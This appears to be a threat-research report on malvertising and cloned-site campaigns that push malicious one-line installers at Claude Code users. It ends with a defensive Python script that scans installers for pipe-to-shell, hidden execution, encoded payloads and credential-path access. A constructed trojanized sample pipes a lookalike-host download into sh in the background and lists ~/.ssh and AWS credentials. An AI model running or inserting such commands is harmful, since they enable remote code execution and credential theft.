When installing AI turns risky: The rising scale of the campaigns targeting Claude Code users
Report summary

The rapid adoption of Anthropic’s Claude Code LLM has been followed by a visible rise in targeted attacks aimed at developers and security practitioners. The common thread across these operations is not just brand impersonation, but the abuse of normal developer behavior: searching for installation guidance, trusting high-ranking search results, and pasting one-line commands into a terminal without validating the source.
The most prominent of these operations is the so-called InstallFix campaign, which combines malvertising, SEO poisoning, and cloned websites and/or documentation to push victims toward malicious PowerShell or bash commands. In several cases, the attacker deliberately installs the legitimate tool in the foreground, so the victim assumes everything worked as expected while credential theft continues quietly in the background.
What makes these campaigns especially serious is the profile of the victim. Claude Code users are typically developers, security engineers, and cloud engineers working from privileged workstations. A successful compromise can expose valuable information like browser sessions, enterprise chat tokens, API keys, SSH keys, cloud credentials, cryptocurrency wallets, source code access, and secrets stored in environment variables or system keychains.
Atos’ Threat Research Center is actively monitoring multiple campaigns and groups that leverage search engine results and the popularity of AI tools. The activity described in the next sections of this article shows a broadening ecosystem of lures. While Claude Code is a central theme, the same infrastructure and tradecraft also appear around Gemini CLI and other developer tools. That suggests the campaign is less about one product alone and more about monetizing trust around fast-growing AI-assisted development workflows.
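The summary above describes both the lure (a one-line install command found through a search result or an ad) and the tactic behind it (the legitimate tool installs in the foreground while a second stage runs in the background). The script below is an added example and is not code from this report, from Atos or from Anthropic: it is a small pre-execution review that a developer or a security team can run over an installer fetched to a file instead of piped straight into a shell. It flags pipe-to-shell constructs, background or hidden execution, encoded payloads, references to local secret stores, and any download host outside an expected allowlist. The allowlist, the two sample installer scripts, the download path under `claude.ai` and the lookalike host `cdn.lookalike-example.test` are constructed assumptions for the demonstration.

```python
import re
from urllib.parse import urlparse

# Hosts an official installer for the tool is expected to reference.
# Assumption / placeholder: adjust this list per tool and organisation.
ALLOWED_HOSTS = {"claude.ai", "anthropic.com"}

# "download something and feed it straight into an interpreter" (bash or PowerShell).
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|irm|Invoke-RestMethod)\b.*\|\s*"
    r"(bash|sh|zsh|iex|Invoke-Expression)\b",
    re.I,
)

# Heuristic indicators of the "install in the foreground, steal in the background" pattern.
INDICATORS = [
    ("background execution",
     re.compile(r"(^|\s)(nohup|setsid|Start-Job)\b|(?<![&>])&\s*$", re.I)),
    ("hidden console window",
     re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden", re.I)),
    ("encoded payload",
     re.compile(r"\b(base64\s+(-d|--decode)|FromBase64String)|-EncodedCommand|-enc\b", re.I)),
    ("secret store access",
     re.compile(r"\.ssh\b|\.aws/credentials|\.config/gcloud|Login Data|find-generic-password", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\"<>|)]+", re.I)


def is_pipe_to_shell(command: str) -> bool:
    """True if a single command downloads and executes in one step."""
    return PIPE_TO_SHELL.search(command) is not None


def unexpected_hosts(script: str) -> list[str]:
    """Hostnames referenced by the script that are not on the allowlist."""
    hosts = set()
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname
        if host and host.lower() not in ALLOWED_HOSTS:
            hosts.add(host.lower())
    return sorted(hosts)


def review_install_script(script: str) -> list[tuple[str, str]]:
    """Return (category, detail) findings; an empty list means nothing was flagged."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        if is_pipe_to_shell(line):
            findings.append(("pipe-to-shell", f"line {lineno}: {line.strip()}"))
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((name, f"line {lineno}: {line.strip()}"))
    for host in unexpected_hosts(script):
        findings.append(("unexpected host", host))
    return findings


# Constructed sample 1: what a reviewer wants to see. Downloads to a file from an
# allowlisted host, verifies a checksum, then installs. The path is an assumption.
BENIGN_INSTALLER = """#!/bin/sh
set -eu
curl -fsSL -o /tmp/claude-code.tgz https://claude.ai/download/claude-code.tgz
sha256sum -c claude-code.tgz.sha256
tar -xzf /tmp/claude-code.tgz -C "$HOME/.local/bin"
"""

# Constructed sample 2: the shape the report describes. The visible line installs the
# real tool; the rest is a harmless stand-in for a background stage, not a real payload.
TROJANIZED_INSTALLER = """#!/bin/sh
# visible part: the genuine installer runs so the victim sees a normal install
curl -fsSL https://claude.ai/install.sh | bash
# hidden part (constructed stand-in): second stage fetched from a lookalike host
nohup sh -c 'curl -fsSL https://cdn.lookalike-example.test/stage2.sh | sh' >/dev/null 2>&1 &
ls "$HOME/.ssh" "$HOME/.aws/credentials"
"""

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_INSTALLER), ("trojanized", TROJANIZED_INSTALLER)):
        print(f"== {label} ==")
        for category, detail in review_install_script(script) or [("clean", "no findings")]:
            print(f"  [{category}] {detail}")
```

In practice the workflow is: fetch the installer with `-o` to a file, run a review like this over it, and only then execute it. The output is a triage aid rather than a verdict: a clean result only means none of these heuristics fired, while any "unexpected host" or "background execution" finding on a script that arrived through a search result or an ad is a reason to stop and compare it against the vendor's documented install path.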
